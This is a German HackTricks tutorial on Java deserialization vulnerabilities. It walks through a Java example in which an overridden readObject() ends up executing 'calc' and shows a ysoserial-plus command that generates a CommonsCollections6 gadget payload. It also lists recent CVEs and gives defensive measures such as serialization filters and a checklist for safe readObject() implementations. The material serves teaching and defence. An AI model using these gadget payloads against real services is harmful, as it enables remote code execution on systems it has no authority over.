Grundlegende Java-Deserialisierung mit ObjectInputStream readObject
Reading time: 7 minutes
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
In diesem POST wird ein Beispiel erklärt, das java.io.Serializable
verwendet und warum das Überschreiben von readObject()
extrem gefährlich sein kann, wenn der eingehende Stream vom Angreifer kontrolliert wird.
Serializable
Das Java Serializable
-Interface (java.io.Serializable
) ist ein Marker-Interface, das Ihre Klassen implementieren müssen, wenn sie serialisiert und deserialisiert werden sollen. Die Java-Objektserialisierung (Schreiben) erfolgt mit dem ObjectOutputStream
und die Deserialisierung (Lesen) erfolgt mit dem ObjectInputStream
.
Erinnerung: Welche Methoden werden während der Deserialisierung implizit aufgerufen?
readObject()
– klassen-spezifische Lese-Logik (wenn implementiert und privat).readResolve()
– kann das deserialisierte Objekt durch ein anderes ersetzen.validateObject()
– überObjectInputValidation
-Callbacks.readExternal()
– für Klassen, dieExternalizable
implementieren.- Konstruktoren werden nicht ausgeführt – daher verlassen sich Gadget-Ketten ausschließlich auf die vorherigen Callbacks.
Jede Methode in dieser Kette, die letztendlich Angreifer-kontrollierte Daten aufruft (Befehlsausführung, JNDI-Abfragen, Reflection usw.), verwandelt die Deserialisierungsroutine in ein RCE-Gadget.
Lassen Sie uns ein Beispiel mit einer Klasse Person sehen, die serialisierbar ist. Diese Klasse überschreibt die readObject-Funktion, sodass, wenn irgendein Objekt dieser Klasse deserialisiert wird, diese Funktion ausgeführt wird.
Im Beispiel ruft die readObject-Funktion der Klasse Person die Funktion eat()
seines Haustiers auf, und die Funktion eat()
eines Hundes (aus irgendeinem Grund) ruft eine calc.exe auf. Wir werden sehen, wie man ein Person-Objekt serialisiert und deserialisiert, um diesen Rechner auszuführen:
Das folgende Beispiel stammt von https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649
import java.io.Serializable;
import java.io.*;
public class TestDeserialization {
interface Animal {
public void eat();
}
//Class must implements Serializable to be serializable
public static class Cat implements Animal,Serializable {
@Override
public void eat() {
System.out.println("cat eat fish");
}
}
//Class must implements Serializable to be serializable
public static class Dog implements Animal,Serializable {
@Override
public void eat() {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
e.printStackTrace();
}
System.out.println("dog eat bone");
}
}
//Class must implements Serializable to be serializable
public static class Person implements Serializable {
private Animal pet;
public Person(Animal pet){
this.pet = pet;
}
//readObject implementation, will call the readObject from ObjectInputStream and then call pet.eat()
private void readObject(java.io.ObjectInputStream stream)
throws IOException, ClassNotFoundException {
pet = (Animal) stream.readObject();
pet.eat();
}
}
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}
public static void main(String[] args) throws Exception {
// Example to call Person with a Dog
Animal animal = new Dog();
Person person = new Person(animal);
GeneratePayload(person,"test.ser");
payloadTest("test.ser");
// Example to call Person with a Cat
//Animal animal = new Cat();
//Person person = new Person(animal);
//GeneratePayload(person,"test.ser");
//payloadTest("test.ser");
}
}
Fazit (klassisches Szenario)
Wie Sie in diesem sehr einfachen Beispiel sehen können, tritt die „Schwachstelle“ hier auf, weil die readObject()-Methode anderen vom Angreifer kontrollierten Code aufruft. In realen Gadget-Ketten können Tausende von Klassen, die in externen Bibliotheken (Commons-Collections, Spring, Groovy, Rome, SnakeYAML usw.) enthalten sind, missbraucht werden – der Angreifer benötigt nur ein erreichbares Gadget, um Codeausführung zu erlangen.
2023-2025: Was gibt es Neues bei Java-Deserialisierungsangriffen?
- 2023 – CVE-2023-34040: Spring-Kafka-Deserialisierung von Fehlerdatensatz-Headern, wenn
checkDeserExWhen*
-Flags aktiviert sind, erlaubte die willkürliche Gadget-Konstruktion aus von Angreifern veröffentlichten Themen. In 3.0.10 / 2.9.11 behoben. ¹ - 2023 – CVE-2023-36480: Aerospike Java-Client vertrauenswürdige Serverannahme gebrochen – bösartige Serverantworten enthielten serialisierte Payloads, die vom Client deserialisiert wurden → RCE. ²
- 2023 – CVE-2023-25581:
pac4j-core
Benutzerprofilattribut-Parsing akzeptierte{#sb64}
-präfixierte Base64-Blobs und deserialisierte sie trotz einesRestrictedObjectInputStream
. Upgrade ≥ 4.0.0. - 2023 – CVE-2023-4528: JSCAPE MFT Manager Service (Port 10880) akzeptierte XML-kodierte Java-Objekte, was zu RCE als root/SYSTEM führte.
- 2024 – Mehrere neue Gadget-Ketten wurden zu ysoserial-plus(mod) hinzugefügt, einschließlich Hibernate5, TomcatEmbed und SnakeYAML 2.x-Klassen, die einige alte Filter umgehen.
Moderne Abwehrmaßnahmen, die Sie implementieren sollten
- JEP 290 / Serialisierungsfilterung (Java 9+) Fügen Sie eine Erlauben- oder Verweigern-Liste von Klassen hinzu:
# Akzeptieren Sie nur Ihre DTOs und java.base, lehnen Sie alles andere ab
-Djdk.serialFilter="com.example.dto.*;java.base/*;!*"
Programmierbeispiel:
var filter = ObjectInputFilter.Config.createFilter("com.example.dto.*;java.base/*;!*" );
ObjectInputFilter.Config.setSerialFilter(filter);
- JEP 415 (Java 17+) Kontext-spezifische Filterfabriken – verwenden Sie einen
BinaryOperator<ObjectInputFilter>
, um unterschiedliche Filter pro Ausführungskontext anzuwenden (z. B. pro RMI-Aufruf, pro Nachrichtenwarteschlangenverbraucher). - Keine rohen
ObjectInputStream
über das Netzwerk exponieren – bevorzugen Sie JSON/Binärkodierungen ohne Codeausführungssemantik (Jackson nach Deaktivierung vonDefaultTyping
, Protobuf, Avro usw.). - Defense-in-Depth-Limits – Setzen Sie maximale Array-Länge, Tiefe, Referenzen:
-Djdk.serialFilter="maxbytes=16384;maxdepth=5;maxrefs=1000"
- Kontinuierliches Gadget-Scannen – führen Sie Tools wie
gadget-inspector
oderserialpwn-cli
in Ihrer CI aus, um den Build zu fehlschlagen, wenn ein gefährliches Gadget erreichbar wird.
Aktualisierte Tooling-Checkliste (2024)
ysoserial-plus.jar
– Community-Fork mit > 130 Gadget-Ketten:
java -jar ysoserial-plus.jar CommonsCollections6 'calc' | base64 -w0
marshalsec
– immer noch das Referenztool für JNDI-Gadget-Generierung (LDAP/RMI).gadget-probe
– schnelle Black-Box-Gadget-Entdeckung gegen Netzwerkdienste.SerialSniffer
– JVMTI-Agent, der jede Klasse druckt, die vonObjectInputStream
gelesen wird (nützlich zum Erstellen von Filtern).- Erkennungstipp – aktivieren Sie
-Djdk.serialDebug=true
(JDK 22+), um Filterentscheidungen und abgelehnte Klassen zu protokollieren.
Schnelle Checkliste für sichere readObject()
-Implementierungen
- Machen Sie die Methode
private
und fügen Sie die@Serial
-Annotation hinzu (hilft bei der statischen Analyse). - Rufen Sie niemals benutzereingereichte Methoden auf oder führen Sie I/O in der Methode aus – lesen Sie nur Felder.
- Wenn eine Validierung erforderlich ist, führen Sie diese nach der Deserialisierung außerhalb von
readObject()
durch. - Bevorzugen Sie die Implementierung von
Externalizable
und führen Sie explizite Feldlesungen anstelle der Standardserialisierung durch. - Registrieren Sie einen gehärteten
ObjectInputFilter
, auch für interne Dienste (kompromissresistentes Design).
Referenzen
- Spring Security Advisory – CVE-2023-34040 Java-Deserialisierung in Spring-Kafka (Aug 2023)
- GitHub Security Lab – GHSL-2023-044: Unsichere Deserialisierung im Aerospike Java-Client (Jul 2023)
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.